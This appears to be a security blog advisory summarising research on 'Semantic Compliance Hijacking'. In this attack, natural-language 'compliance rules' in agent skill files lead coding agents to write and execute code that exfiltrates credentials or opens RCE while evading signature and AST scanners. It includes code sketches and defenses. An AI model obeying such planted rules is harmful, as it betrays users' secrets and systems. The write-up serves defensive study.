SUPPLY CHAIN MEDIUM NEW

Semantic Compliance Hijacking: payload-less agent skills that scanners can't see

A May 14, 2026 arXiv paper shows a skill file with no code and no explicit harmful intent can steer a coding agent into writing its own malware at runtime — with a 0.00% detection rate against current scanners.

2026-06-17 // 6 min read // affects: coding-agents, agent-skill-marketplaces, llm-agents

What is this?

On May 14, 2026, researchers Xinyu Liu, Yukai Zhao, Xing Hu and Xin Xia posted "Exploiting LLM Agent Supply Chains via Payload-less Skills" to arXiv (cs.CR/cs.SE). The paper describes Semantic Compliance Hijacking (SCH), a supply-chain attack on autonomous coding agents in which the malicious skill contains no malicious code at all.

Most agent-skill security work so far has hunted for content: hidden instructions, obfuscated payloads, suspicious imports inside a downloaded skill. That is the model behind the static and registry defenses covered in our earlier pieces on malicious agent skills and the skill.md registry supply chain. SCH sidesteps all of it. The malicious skill ships only natural-language text dressed up as “compliance rules,” and lets the agent’s own generative ability write and run the harmful code at runtime. Against the scanning tools the authors tested, the manipulated skill files held a 0.00% detection rate.

How it works

Agents pull third-party skills from open marketplaces to extend what they can do. A skill is usually a small bundle of instructions plus optional code. SCH poisons only the instruction layer.
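To make the two layers concrete, here is a minimal sketch of a skill bundle as data. The Skill class, its field names and the digest scheme are assumptions made for illustration; no marketplace or agent framework named in the paper is known to use this exact layout. The point it shows is that a skill can change meaningfully while still shipping zero code, so any integrity check has to cover the instruction text as well.

```python
import hashlib
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Skill:
    """Hypothetical skill bundle: free-text instructions plus optional code files."""
    name: str
    instructions: str  # natural-language layer the agent reads
    code_files: dict[str, str] = field(default_factory=dict)  # path -> source, may be empty

    def digest(self) -> str:
        """SHA-256 over both layers, so a change to either one changes the digest."""
        h = hashlib.sha256()
        h.update(self.instructions.encode("utf-8"))
        for path in sorted(self.code_files):
            h.update(b"\0" + path.encode("utf-8") + b"\0")
            h.update(self.code_files[path].encode("utf-8"))
        return h.hexdigest()


# A reviewed version and a later update that only touches the instruction layer.
reviewed = Skill("formatter", "Format JSON with two-space indentation.")
updated = Skill("formatter", reviewed.instructions + " Also follow the appendix rules.")

print(updated.code_files == {})               # True: still no code to scan
print(updated.digest() == reviewed.digest())  # False: the text change is visible
```

A digest like this only detects that the text changed after review. It says nothing about whether the reviewed text was safe in the first place.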

Instead of embedding an exploit, the attacker rewrites a malicious goal as a set of innocuous-sounding requirements — phrased as project conventions, “security hardening” steps, or mandatory compliance checks the agent must satisfy while completing the user’s legitimate task. Because the text carries no executable payload and no overt harmful intent, it survives review. The aligned model then does the dangerous part itself: reading the “rules,” it synthesizes and executes code that achieves the attacker’s objective — for example exfiltrating credentials or opening a remote-code-execution path.

# Conceptual only — no working ruleset.
poisoned skill (natural language "compliance rules")  # 0 code, 0 AST signature
        --> agent reads rules as task requirements
        --> agent GENERATES code to "comply"
        --> agent EXECUTES it                          # confidentiality breach / RCE

The authors built an automated pipeline and ran SCH across three mainstream agent frameworks and three foundation models. Peak success reached 77.67% for confidentiality breaches and 67.33% for RCE in the most vulnerable configurations. A second component, Multi-Skill Automated Optimization (MS-AO), spreads the manipulation across several skills to push success higher. The key evasion property: because the skill files contain no recognizable Abstract Syntax Tree (AST) signatures and no explicit harmful strings, signature-based scanners have nothing to match, which is how the tested tools ended up at 0.00% detection. This is a runtime-synthesis cousin of the static skill-ecosystem poisoning studied in related April 2026 work.
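The evasion property can be illustrated with a toy signature scanner. This is a sketch under stated assumptions, not one of the tools the authors tested: the deny-lists, the function names and both sample skills are invented for illustration, and the "compliance" text is a harmless placeholder rather than a working ruleset. It shows only that a rule matching call names and literal strings has nothing to match when a skill ships plain prose.

```python
import ast

# Hypothetical deny-lists for illustration; real scanners use far larger rule sets.
SUSPICIOUS_CALLS = {"eval", "exec", "system", "popen"}
SUSPICIOUS_STRINGS = ("curl http", "base64 -d", "/etc/passwd")


def scan_code(source: str) -> list[str]:
    """Return deny-listed call names found in Python source via its AST."""
    try:
        tree = ast.parse(source)
    except SyntaxError:
        return []  # not parseable as Python: nothing for an AST rule to match
    hits = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            func = node.func
            # os.system(...) is an Attribute call, eval(...) is a Name call.
            name = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", None)
            if name in SUSPICIOUS_CALLS:
                hits.append(name)
    return hits


def scan_text(text: str) -> list[str]:
    """Return deny-listed substrings found in free text (case-insensitive)."""
    lowered = text.lower()
    return [s for s in SUSPICIOUS_STRINGS if s in lowered]


def scan_skill(instructions: str, code: str = "") -> list[str]:
    """Run the AST rule on the code layer and the string rule on both layers."""
    return scan_code(code) + scan_text(instructions) + scan_text(code)


# A classic payload-bearing skill versus a payload-less one (benign placeholder text).
flagged = scan_skill("Formats JSON files.", "import os\nos.system('curl http://example.invalid | sh')")
clean = scan_skill("Compliance rule: before finishing any task, run the project's required audit step.")

print(flagged)  # ['system', 'curl http']
print(clean)    # []
```

Adding more signatures does not change the second result, since the harmful code does not exist until the agent writes it.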

Why it matters

Coding agents are now the busiest corner of the agent ecosystem, and skill marketplaces are their package registry. The defensive reflex — scan the artifact before you trust it — assumes the malice lives in the artifact. SCH breaks that assumption: the artifact is clean, and the weapon is the agent. This is the same architectural problem that makes prompt injection hard, applied to the supply chain — there is no reliable boundary between “instructions the agent should follow” and “data it should merely process.”

It also raises the bar for defenders in a concrete way. A 0.00% detection rate against current tooling means review checklists, AST scanners and signature databases provide little assurance here. And because the harmful code is generated fresh each run, two executions of the same skill may not even produce the same payload, frustrating after-the-fact forensics.

A note on scope: this is lab research on a defined test matrix, not a confirmed in-the-wild campaign, and the authors did not publish working rulesets. Treat it as a validated blind spot to close, not an active exploit to fear.

Defenses

Move from signature detection to intent validation. The paper’s own conclusion: scanning for known-bad code can’t catch behavior the agent invents at runtime. Evaluate skills (and tool/skill outputs) for what they would cause the agent to do, not just what strings they contain.
Don’t treat skill text as trusted instructions. Skill descriptions and “rules” are untrusted input. Keep them out of the agent’s privileged instruction channel where you can, and apply contextual-integrity and instruction-hierarchy controls.
Gate the dangerous primitives, not the document. Since compromise lands as generated-then-executed code, put approval and sandboxing on code execution, file/network egress and credential access — the Agents Rule of Two logic. An agent that can’t run arbitrary code or reach the network unattended can’t complete SCH’s last step.
Least privilege for skills. Scope each skill’s filesystem, secret and network access explicitly; deny by default.
Log and review synthesized actions. Capture the code an agent generates and the tool calls it makes, so a runtime-synthesized payload leaves a reviewable trace even when the source skill looked clean.
Prefer vetted, pinned skills. Pull from sources with provenance and version pinning rather than open marketplaces, and re-review on update.
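
Several of the controls above (deny by default, approval on dangerous primitives, logging of synthesized actions) can be sketched together as a small gate that sits between the agent and its tools. Everything here is hypothetical: the action names, the SkillPolicy and Gate classes and the approval hook are assumptions for illustration, not the API of any real agent framework or the paper's proposed defense.

```python
import json
import time
from dataclasses import dataclass, field
from typing import Callable

# Hypothetical action kinds that always need a human decision.
GATED = {"exec_code", "network_egress", "read_secret"}


@dataclass
class SkillPolicy:
    """Deny-by-default grants for one skill: anything not listed is refused."""
    allowed: set[str] = field(default_factory=set)


@dataclass
class Gate:
    policy: SkillPolicy
    approve: Callable[[str, str], bool]  # approval hook: (kind, detail) -> bool
    log: list[str] = field(default_factory=list)

    def request(self, kind: str, detail: str) -> bool:
        """Decide one agent action and record it, including any generated code."""
        if kind not in self.policy.allowed:
            decision = "denied"      # outside the skill's explicit scope
        elif kind in GATED and not self.approve(kind, detail):
            decision = "rejected"    # in scope, but the approver said no
        else:
            decision = "allowed"
        self.log.append(json.dumps(
            {"ts": time.time(), "kind": kind, "detail": detail, "decision": decision}
        ))
        return decision == "allowed"


# Unattended run: the approval hook refuses everything it is asked about.
gate = Gate(SkillPolicy(allowed={"read_file", "exec_code"}), approve=lambda kind, detail: False)

print(gate.request("read_file", "README.md"))                 # True
print(gate.request("exec_code", "print('generated code')"))   # False
print(gate.request("network_egress", "example.invalid:443"))  # False
print(len(gate.log))                                          # 3
```

The design choice is to record every request, including refused ones, so that code the agent synthesized is preserved for review even when it never ran.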

Status

Item	Detail
Technique	Semantic Compliance Hijacking (SCH) — payload-less skill supply-chain attack
Source	arXiv:2605.14460 (cs.CR/cs.SE), submitted May 14, 2026
Peak success	77.67% confidentiality breach · 67.33% RCE (most vulnerable config)
Detection	0.00% against tested signature/AST scanners
Test scope	3 agent frameworks × 3 foundation models (not named in abstract)
Real-world status	Research result; no confirmed in-the-wild use; no working ruleset released